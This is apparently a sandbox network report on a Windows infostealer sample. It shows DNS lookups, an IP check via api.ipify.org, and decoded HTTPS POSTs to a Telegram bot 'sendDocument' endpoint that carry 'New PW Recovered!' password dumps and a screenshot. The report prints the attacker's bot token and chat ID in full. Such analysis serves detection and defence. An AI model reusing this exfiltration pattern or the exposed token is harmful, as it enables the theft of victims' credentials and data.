Apr 19, 2024 19:36:51.663330078 CEST | 49737 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:36:51.663345098 CEST | 443 | 49737 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:36:51.663358927 CEST | 443 | 49737 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:36:51.663408995 CEST | 49737 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:36:51.663897038 CEST | 49737 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:36:55.376014948 CEST | 49738 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:36:55.376133919 CEST | 443 | 49738 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:36:55.376205921 CEST | 49738 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:36:55.376703978 CEST | 49738 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:36:55.376734018 CEST | 443 | 49738 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:36:55.803983927 CEST | 443 | 49738 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:36:55.806668043 CEST | 49738 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:36:55.806727886 CEST | 443 | 49738 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:36:56.161742926 CEST | 49738 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:36:56.161848068 CEST | 443 | 49738 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:36:56.169753075 CEST | 49738 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:36:56.169831038 CEST | 443 | 49738 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:36:56.173741102 CEST | 49738 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:36:56.173803091 CEST | 443 | 49738 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:36:56.223915100 CEST | 443 | 49738 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:36:56.333240986 CEST | 49738 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:36:56.898598909 CEST | 443 | 49738 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:36:56.898845911 CEST | 443 | 49738 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:36:56.899373055 CEST | 49738 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:36:56.899373055 CEST | 49738 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:37:12.098566055 CEST | 49739 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:37:12.098627090 CEST | 443 | 49739 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:37:12.098762989 CEST | 49739 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:37:12.099195004 CEST | 49739 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:37:12.099222898 CEST | 443 | 49739 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:37:12.193020105 CEST | 49740 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:37:12.193065882 CEST | 443 | 49740 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:37:12.193130970 CEST | 49740 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:37:12.193521023 CEST | 49740 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:37:12.193533897 CEST | 443 | 49740 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:37:12.524112940 CEST | 443 | 49739 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:37:12.527358055 CEST | 49739 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:37:12.527457952 CEST | 443 | 49739 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:37:12.607883930 CEST | 443 | 49740 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:37:12.609946012 CEST | 49740 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:37:12.609965086 CEST | 443 | 49740 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:37:12.880309105 CEST | 49739 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:37:12.880389929 CEST | 443 | 49739 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:37:12.880515099 CEST | 49739 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:37:12.880554914 CEST | 443 | 49739 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:37:12.880649090 CEST | 49739 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:37:12.880712986 CEST | 443 | 49739 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:37:12.957851887 CEST | 443 | 49739 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:37:12.958271980 CEST | 49740 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:37:12.958304882 CEST | 443 | 49740 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:37:12.958384991 CEST | 49740 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:37:12.958395004 CEST | 443 | 49740 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:37:12.958475113 CEST | 49740 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:37:12.958504915 CEST | 443 | 49740 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:37:13.004965067 CEST | 49739 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:37:13.018131971 CEST | 443 | 49740 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:37:13.067512035 CEST | 49740 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:37:13.742862940 CEST | 443 | 49739 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:37:13.742939949 CEST | 443 | 49739 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:37:13.742940903 CEST | 49739 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:37:13.742991924 CEST | 49739 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:37:13.743285894 CEST | 49739 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:37:13.808924913 CEST | 443 | 49740 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:37:13.808995962 CEST | 49740 | 443 | 192.168.2.5 | 149.154.167.220
Apr 19, 2024 19:37:13.808998108 CEST | 443 | 49740 | 149.154.167.220 | 192.168.2.5
Apr 19, 2024 19:37:13.809051991 CEST | 49740 | 443 | 192.168.2.5 | 149.154.167.220
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 19, 2024 19:33:04.422277927 CEST | 53076 | 53 | 192.168.2.5 | 1.1.1.1
Apr 19, 2024 19:33:04.527829885 CEST | 53 | 53076 | 1.1.1.1 | 192.168.2.5
Apr 19, 2024 19:33:05.819991112 CEST | 52707 | 53 | 192.168.2.5 | 1.1.1.1
Apr 19, 2024 19:33:05.925828934 CEST | 53 | 52707 | 1.1.1.1 | 192.168.2.5
Apr 19, 2024 19:37:12.085498095 CEST | 57280 | 53 | 192.168.2.5 | 1.1.1.1
Apr 19, 2024 19:37:12.192385912 CEST | 53 | 57280 | 1.1.1.1 | 192.168.2.5

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 19, 2024 19:33:04.422277927 CEST | 192.168.2.5 | 1.1.1.1 | 0x4003 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Apr 19, 2024 19:33:05.819991112 CEST | 192.168.2.5 | 1.1.1.1 | 0x56c9 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Apr 19, 2024 19:37:12.085498095 CEST | 192.168.2.5 | 1.1.1.1 | 0x8543 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 19, 2024 19:33:04.527829885 CEST | 1.1.1.1 | 192.168.2.5 | 0x4003 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Apr 19, 2024 19:33:04.527829885 CEST | 1.1.1.1 | 192.168.2.5 | 0x4003 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Apr 19, 2024 19:33:04.527829885 CEST | 1.1.1.1 | 192.168.2.5 | 0x4003 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Apr 19, 2024 19:33:05.925828934 CEST | 1.1.1.1 | 192.168.2.5 | 0x56c9 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Apr 19, 2024 19:37:12.192385912 CEST | 1.1.1.1 | 192.168.2.5 | 0x8543 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false

• api.ipify.org
• api.telegram.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49705 | 104.26.12.205 | 443 | 3472 | C:\Users\user\Desktop\z1E-catalogSamples.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-19 17:33:04 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-04-19 17:33:05 UTC | 211 | IN | HTTP/1.1 200 OK
Date: Fri, 19 Apr 2024 17:33:05 GMT
Content-Type: text/plain
Content-Length: 12
Connection: close
Vary: Origin
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 876ea33a0bb81363-ATL
2024-04-19 17:33:05 UTC | 12 | IN | Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 35 32
Data Ascii: 81.181.57.52


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49706 | 149.154.167.220 | 443 | 3472 | C:\Users\user\Desktop\z1E-catalogSamples.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-19 17:33:06 UTC | 260 | OUT | POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------8dc60a788f191e0
Host: api.telegram.org
Content-Length: 971
Expect: 100-continue
Connection: Keep-Alive
                                                                  2024-04-19 17:33:06 UTC971OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 30 61 37 38 38 66 31 39 31 65 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 31 30 35 35 38 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 30 61 37 38 38 66 31 39 31 65 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 34 2f 31 39 2f 32 30 32 34 20 31 39 3a 33 33 3a 30 35 0a 55 73 65 72
                                                                  Data Ascii: -----------------------------8dc60a788f191e0Content-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc60a788f191e0Content-Disposition: form-data; name="caption"New PW Recovered!Time: 04/19/2024 19:33:05User
2024-04-19 17:33:06 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-04-19 17:33:07 UTC | 1115 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 19 Apr 2024 17:33:06 GMT
Content-Type: application/json
Content-Length: 727
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
{"ok":true,"result":{"message_id":3318,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713547986,"document":{"file_name":"user-618321 2024-04-19 19-33-05.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIM9mYiqtL-K8bdpKuwa8f63o3UMu4VAAKnFwACi1IZUdt_S1JLSfEINAQ","file_unique_id":"AgADpxcAAotSGVE","file_size":348},"caption":"New PW Recovered!\n\nTime: 04/19/2024 19:33:05\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


Session ID: 2 | Source IP: 192.168.2.5 | Source Port: 49707 | Destination IP: 104.26.12.20 | Destination Port: 443 | PID: 7324 | Process: C:\Users\user\AppData\Roaming\vZkoWbol.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 17:33:08 UTC | 155 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
2024-04-19 17:33:08 UTC | 211 | IN | HTTP/1.1 200 OK
    Date: Fri, 19 Apr 2024 17:33:08 GMT
    Content-Type: text/plain
    Content-Length: 12
    Connection: close
    Vary: Origin
    CF-Cache-Status: DYNAMIC
    Server: cloudflare
    CF-RAY: 876ea350caf8672b-ATL
2024-04-19 17:33:08 UTC | 12 | IN | Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 35 32
    Data Ascii: 81.181.57.52


Session ID: 3 | Source IP: 192.168.2.5 | Source Port: 49708 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 7324 | Process: C:\Users\user\AppData\Roaming\vZkoWbol.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 17:33:09 UTC | 260 | OUT | POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------8dc60a78b10ac3b
    Host: api.telegram.org
    Content-Length: 971
    Expect: 100-continue
    Connection: Keep-Alive
2024-04-19 17:33:10 UTC | 971 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 30 61 37 38 62 31 30 61 63 33 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 31 30 35 35 38 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 30 61 37 38 62 31 30 61 63 33 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 34 2f 31 39 2f 32 30 32 34 20 31 39 3a 33 33 3a 30 38 0a 55 73 65 72
    Data Ascii: -----------------------------8dc60a78b10ac3bContent-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc60a78b10ac3bContent-Disposition: form-data; name="caption"New PW Recovered!Time: 04/19/2024 19:33:08User
2024-04-19 17:33:10 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-04-19 17:33:10 UTC | 1115 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Fri, 19 Apr 2024 17:33:10 GMT
    Content-Type: application/json
    Content-Length: 727
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    {"ok":true,"result":{"message_id":3324,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713547990,"document":{"file_name":"user-618321 2024-04-19 19-33-08.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIM_GYiqtbS_aNeM0Sh8rUzTUMJRosKAAKpFwACi1IZUSdyn0NshDvlNAQ","file_unique_id":"AgADqRcAAotSGVE","file_size":348},"caption":"New PW Recovered!\n\nTime: 04/19/2024 19:33:08\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


Session ID: 4 | Source IP: 192.168.2.5 | Source Port: 49717 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 3472 | Process: C:\Users\user\Desktop\z1E-catalogSamples.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 17:34:13 UTC | 238 | OUT | POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------8dc641d35d1784c
    Host: api.telegram.org
    Content-Length: 67144
    Expect: 100-continue
2024-04-19 17:34:14 UTC | 1024 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 34 31 64 33 35 64 31 37 38 34 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 31 30 35 35 38 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 34 31 64 33 35 64 31 37 38 34 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 34 2f 32 34 2f 32 30 32 34 20 30 35 3a 30 37 3a 35 39 0a 55 73 65 72
    Data Ascii: -----------------------------8dc641d35d1784cContent-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc641d35d1784cContent-Disposition: form-data; name="caption"New SC Recovered!Time: 04/24/2024 05:07:59User
2024-04-19 17:34:14 UTC | 16355 | OUT | Data Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
    Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"|
2024-04-19 17:34:14 UTC | 16355 | OUT | Data Raw: e7 92 7f df 22 9c aa aa 30 a0 01 e8 2b 4a 58 19 c6 a2 94 a4 ac 8c eb 66 b4 1d 19 c2 9c 5d e4 ad ad 85 a2 8a 2b d5 3e 78 28 a2 8a 00 b5 a5 b2 a6 a9 6a cc 42 a8 95 49 24 e0 01 9a ee 3e dd 67 ff 00 3f 70 7f df c5 ff 00 1a f3 da 2b 8e be 17 db 4b 9a f6 3d 0c 2e 3b ea f0 70 e5 be bd cf 42 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a 4f b7 d9 7f cf e5 bf fd fd 5f f1 af 3e a2 b0 fe cf fe f7 e1 ff 00 04 e9 fe d5 fe e7 e3 ff 00 00 ea 7c 4f 75 6d 36 9a 89 0d c4 52 37 9a 0e 11 c1 38 c1 f4 ae 56 8a 2b b3 0f 47 d8 c7 96 f7 38 31 58 8f ac 4d 4a d6 d0 28 a2 8a dc e6 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51
    Data Ascii: "0+JXf]+>x(jBI$>g?p+K=.;pB}[O_>|Oum6R78V+G81XMJ(((JZ((((((QEJ)hZJ(JZJQE0(ZJQ
2024-04-19 17:34:14 UTC | 16355 | OUT | Data Raw: d9 f2 82 51 45 14 00 57 49 e0 bf f9 06 dd 7f d7 d3 ff 00 25 ae 6e ba 4f 05 ff 00 c8 36 eb fe be 9f f9 2d 79 79 8f d8 f9 9f 41 92 fc 35 7d 17 e6 6f 4b 22 43 13 cb 23 05 44 05 98 9e c0 57 19 a1 eb 31 5a de de 5e cc 9f ba bb 72 ec 63 52 4c 58 27 01 bb 73 9a d6 d5 34 7b ed 57 50 29 3c 81 6c 43 02 30 e7 ee 80 32 02 fa 93 9e 4e 6b 71 21 8a 38 04 09 1a 88 82 ed 09 8e 31 e9 5e 3b 52 9c ae b4 b1 f4 d0 9d 2a 14 9c 5f bc e5 bd ba 2f f3 ff 00 22 b5 96 a7 6d 7b 2b c3 19 75 95 14 31 49 10 a9 c1 e8 7d c5 73 3e 2a ff 00 91 8a 3f fa f5 1f fa 19 ae ae da c6 d2 d1 99 ad ad a2 85 9b ef 14 40 33 5c a7 8a bf e4 62 8f fe bd 47 fe 86 6b a2 85 fd a4 2f dc e1 c4 f2 7b 1a bc 9b 72 bd fe 46 65 14 51 5f 48 7c 38 51 45 14 00 51 45 14 0c 28 a2 8a 00 28 a2 8a 00 4a 29 68 a0 04 a2 96 8a
    Data Ascii: QEWI%nO6-yyA5}oK"C#DW1Z^rcRLX's4{WP)<lC02Nkq!81^;R*_/"m{+u1I}s>*?@3\bGk/{rFeQ_H|8QEQE((J)h
2024-04-19 17:34:14 UTC | 15447 | OUT | Data Raw: a2 8a 29 80 51 45 14 00 51 45 14 00 94 51 45 03 0a 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 25 14 51 40 05 14 51 40 c2 90 d2 f6 a4 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 02 51 4b 49 40 c2 8a 28 a0 02 92 8a 29 8c 28 a2 8a 00 4a 28 cd 26 68 18 b4 94 94 50 16 0c fb 52 66 8a 28 18 52 52 d2 50 01 49 4b 49 40 c2 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 a2 8a 06 21 a2 8a 28 00 a4 a5 a4 a0 61 49 4b 49 40 05 25 2d 14 14 25 14 52 50 08 5a 4a 28 a0 04 34 51 45 03 0a 4a 5a 4a 06 14 94 51 40 09 45 2d 25 03 0a 4a 5a 4a 06 14 94 51 40 05 25 2d 14 0c 4a 28 a2 81 85 25 14 94 00 b4 94 51 40 c3 8a 29 28 a0 02 8a 28 a0 62 51 45 14 0c 4a 28 a2 80 0a 28 a4 a6 30 fe 74 51 f9 50 69 0c 43 c7 34 51 45 30 13 f1 a3 8a 28 a0 61 49 c5 2d 27 14 80 3d e8 fa 51 45
    Data Ascii: )QEQEQEJZJ(QE%Q@Q@((RRPEPQKI@()(J(&hPRf(RRPIKI@(aIERRP0((!(aIKI@%-%RPZJ(4QEJZJQ@E-%JZJQ@%-J(%Q@)((bQEJ((0tQPiC4QE0(aI-'=QE
2024-04-19 17:34:14 UTC | 1558 | OUT | Data Raw: e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 00 4f ff 00 1e f2 7f ba 7f 95 7c f3 5f 41 cd 34 46 09 00 91 09 2a 7f 88 7a 57 cf 95 71 33 98 56 e6 99 e2 49 ec ec 7e c1 73 6b 05 fd 9e 77 2c 37 0b 90 a7 d4 1e df 85 61 d1 54 41 b9 a9 f8 92 7b cb 1f b0 5b 5a c1 61 67 9d cd 0d ba e0 31 f5 27 bf e3 58 74 51 40 05 14 51 4c 02 b5 ee 7c 4f ae 5c 5d 4b 3f f6 ad e4 5e 63 97 f2 e2 b8 75 45 c9 ce 14 67 80 3b 56
    Data Ascii: Q=S%OQ=S%OQ=S%OQ=S%OQ=S%OQ=S%OQ=SO|_A4F*zWq3VI~skw,7aTA{[Zag1'XtQ@QL|O\]K?^cuEg;V
2024-04-19 17:34:14 UTC | 50 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 34 31 64 33 35 64 31 37 38 34 63 2d 2d 0d 0a
    Data Ascii: -----------------------------8dc641d35d1784c--
2024-04-19 17:34:14 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-04-19 17:34:14 UTC | 1485 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Fri, 19 Apr 2024 17:34:14 GMT
    Content-Type: application/json
    Content-Length: 1096
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    {"ok":true,"result":{"message_id":3389,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548054,"document":{"file_name":"user-618321 2024-04-24 05-12-59.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg09ZiKrFuU3wQABBBDHVD8ReyDOBjl1AAKtFwACi1IZUYHvec-2_rA0AQAHbQADNAQ","file_unique_id":"AQADrRcAAotSGVFy","file_size":12508,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg09ZiKrFuU3wQABBBDHVD8ReyDOBjl1AAKtFwACi1IZUYHvec-2_rA0AQAHbQADNAQ","file_unique_id":"AQADrRcAAotSGVFy","file_size":12508,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINPWYiqxblN8EAAQQQx1Q_EXsgzgY5dQACrRcAAotSGVGB73nPtv6wNDQE","file_unique_id":"AgADrRcAAotSGVE","file_size":66521},"caption":"New SC Recovered!\n\nTime: 04/24/2024 05:07:59\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


